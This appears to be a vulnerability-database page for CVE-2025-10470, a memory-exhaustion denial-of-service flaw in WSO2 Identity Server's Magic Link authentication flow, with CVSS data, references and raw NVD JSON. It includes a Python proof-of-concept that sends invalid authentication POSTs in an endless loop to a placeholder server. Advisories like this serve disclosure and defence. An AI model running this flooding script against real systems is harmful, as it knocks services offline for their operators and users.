CVE-2025-10470

Description

The Magic Link authentication flow accepts multiple invalid authentication requests without adequate rate limiting or resource control, leading to uncontrolled memory usage growth. This vulnerability can result in a denial-of-service condition, causing service unavailability for deployments that utilize the Magic Link authenticator. The impact is limited to these specific deployments and requires repeated invalid authentication attempts to trigger.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WSO2 Identity Server (具体受影响版本请参考官方公告 WSO2-2025-4469)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL for Magic Link authentication (Example) target_url = "https://target-wso2-server/commonauth" headers = { "User-Agent": "CVE-2025-10470-POC", "Content-Type": "application/x-www-form-urlencoded", "Accept": "application/json" } # Data representing an invalid Magic Link request payload = { "username": "[email protected]", "authenticator": "org.wso2.carbon.identity.application.authenticator.magiclink.MagicLinkAuthenticator", "type": "magiclink" } def attack(): print("[*] Starting DoS attack on Magic Link flow...") try: while True: # Send POST request to trigger memory growth response = requests.post(target_url, data=payload, headers=headers, timeout=5) if response.status_code == 200 or response.status_code == 401: print(f"Request sent, server status: {response.status_code}") except KeyboardInterrupt: print("\n[!] Attack stopped by user.") except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": attack()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-10470
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-10470
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-10470/
[4] VulDB https://vuldb.com/cve/CVE-2025-10470
[5] https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4469/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-10470", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2026-05-11T12:16:10.530", "lastModified": "2026-05-11T12:16:10.530", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Magic Link authentication flow accepts multiple invalid authentication requests without adequate rate limiting or resource control, leading to uncontrolled memory usage growth.\n\nThis vulnerability can result in a denial-of-service condition, causing service unavailability for deployments that utilize the Magic Link authenticator. The impact is limited to these specific deployments and requires repeated invalid authentication attempts to trigger."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4469/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"}]}}